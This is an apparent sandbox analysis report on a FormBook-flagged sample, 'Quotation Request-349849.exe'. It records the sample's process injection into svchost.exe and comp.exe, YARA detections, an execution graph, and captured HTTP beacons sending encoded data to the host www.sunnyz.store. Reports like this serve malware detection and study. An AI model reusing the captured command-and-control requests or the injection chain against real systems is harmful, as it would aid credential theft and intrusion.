                                                    Data Raw: 55 5a 6b 74 5f 70 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 65 76 4f 51 55 57 71 54 68 6c 78 76 76 65 31 65 57 6c 71 55 51 79 36 47 6f 67 7a 45 61 31 39 39 6b 58 63 36 53 67 77 6c 4c 6f 2b 4d 6d 73 6c 35 55 6e 61 7a 4b 68 67 58 42 35 4e 46 43 58 33 59 68 2f 70 68 32 34 34 39 2f 47 6b 6d 51 70 39 6f 4a 47 67 4a 49 64 37 67 66 67 55 77 56 57 4d 64 5a 49 65 41 35 32 64 38 75 4e 6b 50 51 71 63 58 66 47 53 31 56 35 39 30 58 62 37 43 72 49 59 37 61 48 50 42 52 6b 4b 5a 64 6e 4c 78 44 69 6b 69 79 4e 70 57 4e 64 66 66 63 50 31 38 70 66 32 53 35 30 7a 4b 48 53 62 39 6e 6e 67 79 6b 58 46 30 70 41 62 51 66 4c 51 6e 30 33 59 56 4d 3d
                                                    Data Ascii: UZkt_p=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxDikiyNpWNdffcP18pf2S50zKHSb9nngykXF0pAbQfLQn03YVM=
                                                    Dec 13, 2024 13:08:30.458702087 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:30 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    15192.168.2.749989217.70.184.5080
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:32.466933012 CET1898OUTPOST /ead0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sunnyz.store
                                                    Referer: http://www.sunnyz.store/ead0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 47 76 53 79 63 57 34 67 35 6c 79 76 76 65 72 4f 57 34 71 55 51 56 36 47 41 6b 7a 45 48 43 39 2f 73 58 61 62 79 67 6c 6b 4c 6f 72 63 6d 73 70 5a 55 71 55 54 4b 77 67 58 52 39 4e 42 6d 58 33 59 68 2f 70 69 75 34 6f 63 2f 47 2f 6d 51 75 72 34 4a 61 72 70 4a 79 37 67 58 65 55 77 68 6f 4d 73 35 49 66 67 70 32 4f 66 47 4e 6f 50 51 6b 64 58 65 42 53 31 5a 59 39 30 36 67 37 47 6a 75 59 38 75 48 5a 6d 73 34 59 36 64 47 51 42 75 2b 76 30 53 50 67 6e 42 2b 5a 4d 31 77 32 4f 4e 51 7a 43 35 42 2f 61 6e 6c 62 6f 79 5a 2f 7a 45 6e 4c 6c 46 4b 53 41 69 52 41 31 34 47 42 51 7a 4c 6b 6b 56 33 6d 58 6f 47 64 33 34 34 4b 70 6a 53 44 47 73 75 67 4a 52 4d 73 74 37 48 4d 70 7a 58 32 74 54 58 6e 53 39 62 70 67 45 4b 62 35 31 53 2b 30 31 73 79 68 51 43 47 33 64 74 50 65 6a 4e 4b 67 4a 31 59 62 4a 56 51 69 5a 66 53 43 6f 2f 6c 6d 43 47 62 5a 6d 30 31 67 51 32 30 4e 6d 62 61 68 52 [TRUNCATED]
                                                    Data Ascii: UZkt_p=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+GvSycW4g5lyvverOW4qUQV6GAkzEHC9/sXabyglkLorcmspZUqUTKwgXR9NBmX3Yh/piu4oc/G/mQur4JarpJy7gXeUwhoMs5Ifgp2OfGNoPQkdXeBS1ZY906g7GjuY8uHZms4Y6dGQBu+v0SPgnB+ZM1w2ONQzC5B/anlboyZ/zEnLlFKSAiRA14GBQzLkkV3mXoGd344KpjSDGsugJRMst7HMpzX2tTXnS9bpgEKb51S+01syhQCG3dtPejNKgJ1YbJVQiZfSCo/lmCGbZm01gQ20NmbahRgAutxkWAiWl1izBn4r0mPaxZQAEpjLCqp4vXhVs+cDKYOU0sRW4wMzkh8y9aKOKLfNjlIPVsyk/ESoblX9yNAtCjUsPaExToncfaF9C04wAyoVaR0qGqg9wzTBFErrqAJc3yBGjDguRKl2ZJKAZ5kJjTpxrDjMrs9cqdIsXLSl6/28ZhzKFU2wMUeCvh+2WFvWuecscAcZpZztX2M+mASxM7uH6QJwWvjNxXcF3Vv0PDpxiX7hkg881PeikgyZl4hFb26J1Gz1OqKYWUdjR3dbXsM56Dla8BFHvFzT9U96sMiKM0NSSlf9XZ6ahBPYNdmbh9f2aX+bU3VdTcVTaqABIEeRVwDtJ55L/tQQ+T0Ts5cdxcF7rQqyvZbSB9hMPw30WWpHJ3yB+uql+FAjC6KRAZLIpcJWVHzS1dy4OLV/+SpjiBftsU38XT2VDdGuQl5NVZg0dyv+g2YrRX0VTqY0b4Cwjt6reX62XeUPB4kNeVq2JSSgPfJ8l2rk06DmctbUTfDYh/uIO0Dq/XFxP8WI1IJq7B+dJTzFX6WddDN+5eCezPLobIUA7L4LAQFBWedB57nyCpeElNzdGWP5ljXdBEiWpsI6vD8I0aIXoIsQF6JMnymVD4tB9pW0GcJmr6z1yZHcCC21Zhxy/jnY+AhU3aVowHSdB/sZ [TRUNCATED]
                                                    Dec 13, 2024 13:08:33.827815056 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:33 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    16192.168.2.749990217.70.184.5080
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:35.131360054 CET599OUTGET /ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Dec 13, 2024 13:08:36.422768116 CET1236INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Content-Security-Policy: default-src 'self'; script-src 'nonce-b1c53dea5f314d13a7914e495cb2ee85';
                                                    Vary: Accept-Language
                                                    Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 62 31 63 35 33 64 65 61 35 66 33 31 34 64 31 33 61 37 39 31 34 65 34 39 35 63 62 32 65 65 38 35 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                    Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-b1c53dea5f314d13a7914e495cb2ee85';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                    Dec 13, 2024 13:08:36.422811985 CET1236INData Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                    Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                    Dec 13, 2024 13:08:36.422833920 CET160INData Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                    Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:07:06:23
                                                    Start date:13/12/2024
                                                    Path:C:\Users\user\Desktop\Quotation Request-349849.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Quotation Request-349849.exe"
                                                    Imagebase:0x7d0000
                                                    File size:1'201'664 bytes
                                                    MD5 hash:060D1FA22CA3227BEF173104F09A853C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:07:06:26
                                                    Start date:13/12/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Quotation Request-349849.exe"
                                                    Imagebase:0x950000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:08:37:29
                                                    Start date:13/12/2024
                                                    Path:C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe"
                                                    Imagebase:0xa0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:6
                                                    Start time:08:37:31
                                                    Start date:13/12/2024
                                                    Path:C:\Windows\SysWOW64\comp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\comp.exe"
                                                    Imagebase:0xc80000
                                                    File size:23'552 bytes
                                                    MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:08:37:44
                                                    Start date:13/12/2024
                                                    Path:C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe"
                                                    Imagebase:0xa0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:11
                                                    Start time:08:37:57
                                                    Start date:13/12/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff722870000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.8%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:6.9%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:77
                                                      execution_graph 100978 7d107d 100983 7d708b 100978->100983 100980 7d108c 101014 7f2d40 100980->101014 100984 7d709b __ftell_nolock 100983->100984 101017 7d7667 100984->101017 100988 7d715a 101029 7f050b 100988->101029 100995 7d7667 59 API calls 100996 7d718b 100995->100996 101048 7d7d8c 100996->101048 100998 7d7194 RegOpenKeyExW 100999 80e8b1 RegQueryValueExW 100998->100999 101003 7d71b6 Mailbox 100998->101003 101000 80e943 RegCloseKey 100999->101000 101001 80e8ce 100999->101001 101000->101003 101013 80e955 _wcscat Mailbox __wsetenvp 101000->101013 101052 7f0db6 101001->101052 101003->100980 101004 80e8e7 101062 7d522e 101004->101062 101007 7d79f2 59 API calls 101007->101013 101008 80e90f 101065 7d7bcc 101008->101065 101010 80e929 101010->101000 101012 7d3f74 59 API calls 101012->101013 101013->101003 101013->101007 101013->101012 101074 7d7de1 101013->101074 101139 7f2c44 101014->101139 101016 7d1096 101018 7f0db6 Mailbox 59 API calls 101017->101018 101019 7d7688 101018->101019 101020 7f0db6 Mailbox 59 API calls 101019->101020 101021 7d7151 101020->101021 101022 7d4706 101021->101022 101078 801940 101022->101078 101025 7d7de1 59 API calls 101026 7d4739 101025->101026 101080 7d4750 101026->101080 101028 7d4743 Mailbox 101028->100988 101030 801940 __ftell_nolock 101029->101030 101031 7f0518 GetFullPathNameW 101030->101031 101032 7f053a 101031->101032 101033 7d7bcc 59 API calls 101032->101033 101034 7d7165 101033->101034 101035 7d7cab 101034->101035 101036 7d7cbf 101035->101036 101037 80ed4a 101035->101037 101102 7d7c50 101036->101102 101107 7d8029 101037->101107 101040 7d7173 101042 7d3f74 101040->101042 101041 80ed55 __wsetenvp _memmove 101043 7d3f82 101042->101043 101047 7d3fa4 _memmove 101042->101047 101045 7f0db6 Mailbox 59 API calls 101043->101045 101044 7f0db6 Mailbox 59 API calls 101046 7d3fb8 101044->101046 101045->101047 101046->100995 101047->101044 101049 7d7da6 101048->101049 101051 7d7d99 101048->101051 101050 7f0db6 Mailbox 59 API calls 101049->101050 101050->101051 101051->100998 101054 7f0dbe 101052->101054 101055 7f0dd8 101054->101055 101057 7f0ddc std::exception::exception 101054->101057 101110 7f571c 101054->101110 101127 7f33a1 DecodePointer 101054->101127 101055->101004 101128 7f859b RaiseException 101057->101128 101059 7f0e06 101129 7f84d1 58 API calls _free 101059->101129 101061 7f0e18 101061->101004 101063 7f0db6 Mailbox 59 API calls 101062->101063 101064 7d5240 RegQueryValueExW 101063->101064 101064->101008 101064->101010 101066 7d7bd8 __wsetenvp 101065->101066 101067 7d7c45 101065->101067 101069 7d7bee 101066->101069 101070 7d7c13 101066->101070 101068 7d7d2c 59 API calls 101067->101068 101073 7d7bf6 _memmove 101068->101073 101138 7d7f27 59 API calls Mailbox 101069->101138 101072 7d8029 59 API calls 101070->101072 101072->101073 101073->101010 101075 7d7df0 __wsetenvp _memmove 101074->101075 101076 7f0db6 Mailbox 59 API calls 101075->101076 101077 7d7e2e 101076->101077 101077->101013 101079 7d4713 GetModuleFileNameW 101078->101079 101079->101025 101081 801940 __ftell_nolock 101080->101081 101082 7d475d GetFullPathNameW 101081->101082 101083 7d477c 101082->101083 101084 7d4799 101082->101084 101085 7d7bcc 59 API calls 101083->101085 101086 7d7d8c 59 API calls 101084->101086 101087 7d4788 101085->101087 101086->101087 101090 7d7726 101087->101090 101091 7d7734 101090->101091 101094 7d7d2c 101091->101094 101093 7d4794 101093->101028 101095 7d7d3a 101094->101095 101097 7d7d43 _memmove 101094->101097 101095->101097 101098 7d7e4f 101095->101098 101097->101093 101099 7d7e62 101098->101099 101101 7d7e5f _memmove 101098->101101 101100 7f0db6 Mailbox 59 API calls 101099->101100 101100->101101 101101->101097 101103 7d7c5f __wsetenvp 101102->101103 101104 7d8029 59 API calls 101103->101104 101105 7d7c70 _memmove 101103->101105 101106 80ed07 _memmove 101104->101106 101105->101040 101108 7f0db6 Mailbox 59 API calls 101107->101108 101109 7d8033 101108->101109 101109->101041 101111 7f5797 101110->101111 101119 7f5728 101110->101119 101136 7f33a1 DecodePointer 101111->101136 101113 7f579d 101137 7f8b28 58 API calls __getptd_noexit 101113->101137 101116 7f575b RtlAllocateHeap 101117 7f578f 101116->101117 101116->101119 101117->101054 101119->101116 101120 7f5783 101119->101120 101121 7f5733 101119->101121 101125 7f5781 101119->101125 101133 7f33a1 DecodePointer 101119->101133 101134 7f8b28 58 API calls __getptd_noexit 101120->101134 101121->101119 101130 7fa16b 58 API calls 2 library calls 101121->101130 101131 7fa1c8 58 API calls 8 library calls 101121->101131 101132 7f309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101121->101132 101135 7f8b28 58 API calls __getptd_noexit 101125->101135 101127->101054 101128->101059 101129->101061 101130->101121 101131->101121 101133->101119 101134->101125 101135->101117 101136->101113 101137->101117 101138->101073 101140 7f2c50 __tzset_nolock 101139->101140 101147 7f3217 101140->101147 101146 7f2c77 __tzset_nolock 101146->101016 101164 7f9c0b 101147->101164 101149 7f2c59 101150 7f2c88 DecodePointer DecodePointer 101149->101150 101151 7f2c65 101150->101151 101152 7f2cb5 101150->101152 101161 7f2c82 101151->101161 101152->101151 101210 7f87a4 59 API calls __mbsnbicoll_l 101152->101210 101154 7f2d18 EncodePointer EncodePointer 101154->101151 101155 7f2cc7 101155->101154 101156 7f2cec 101155->101156 101211 7f8864 61 API calls __realloc_crt 101155->101211 101156->101151 101160 7f2d06 EncodePointer 101156->101160 101212 7f8864 61 API calls __realloc_crt 101156->101212 101159 7f2d00 101159->101151 101159->101160 101160->101154 101213 7f3220 101161->101213 101165 7f9c2f EnterCriticalSection 101164->101165 101166 7f9c1c 101164->101166 101165->101149 101171 7f9c93 101166->101171 101168 7f9c22 101168->101165 101195 7f30b5 58 API calls 3 library calls 101168->101195 101172 7f9c9f __tzset_nolock 101171->101172 101173 7f9ca8 101172->101173 101174 7f9cc0 101172->101174 101196 7fa16b 58 API calls 2 library calls 101173->101196 101188 7f9ce1 __tzset_nolock 101174->101188 101199 7f881d 58 API calls 2 library calls 101174->101199 101176 7f9cad 101197 7fa1c8 58 API calls 8 library calls 101176->101197 101179 7f9cd5 101181 7f9cdc 101179->101181 101182 7f9ceb 101179->101182 101180 7f9cb4 101198 7f309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101180->101198 101200 7f8b28 58 API calls __getptd_noexit 101181->101200 101183 7f9c0b __lock 58 API calls 101182->101183 101186 7f9cf2 101183->101186 101189 7f9cff 101186->101189 101190 7f9d17 101186->101190 101188->101168 101201 7f9e2b InitializeCriticalSectionAndSpinCount 101189->101201 101202 7f2d55 101190->101202 101193 7f9d0b 101208 7f9d33 LeaveCriticalSection _doexit 101193->101208 101196->101176 101197->101180 101199->101179 101200->101188 101201->101193 101203 7f2d5e RtlFreeHeap 101202->101203 101207 7f2d87 _free 101202->101207 101204 7f2d73 101203->101204 101203->101207 101209 7f8b28 58 API calls __getptd_noexit 101204->101209 101206 7f2d79 GetLastError 101206->101207 101207->101193 101208->101188 101209->101206 101210->101155 101211->101156 101212->101159 101216 7f9d75 LeaveCriticalSection 101213->101216 101215 7f2c87 101215->101146 101216->101215 101217 15eb648 101231 15e9298 101217->101231 101219 15eb6fd 101234 15eb538 101219->101234 101237 15ec728 GetPEB 101231->101237 101233 15e9923 101233->101219 101235 15eb541 Sleep 101234->101235 101236 15eb54f 101235->101236 101238 15ec752 101237->101238 101238->101233 101239 7de5ab 101242 7dd100 101239->101242 101241 7de5b9 101243 7dd11d 101242->101243 101260 7dd37d 101242->101260 101244 812691 101243->101244 101245 8126e0 101243->101245 101265 7dd144 101243->101265 101246 812694 101244->101246 101256 8126af 101244->101256 101314 84a3e6 341 API calls __cinit 101245->101314 101249 8126a0 101246->101249 101246->101265 101312 84a9fa 341 API calls 101249->101312 101252 7f2d40 __cinit 67 API calls 101252->101265 101253 7dd434 101306 7d8a52 68 API calls 101253->101306 101254 8128b5 101254->101254 101255 7dd54b 101255->101241 101256->101260 101313 84aea2 341 API calls 3 library calls 101256->101313 101260->101255 101335 839e4a 89 API calls 4 library calls 101260->101335 101261 8127fc 101334 84a751 89 API calls 101261->101334 101262 7dd443 101262->101241 101265->101252 101265->101253 101265->101255 101265->101260 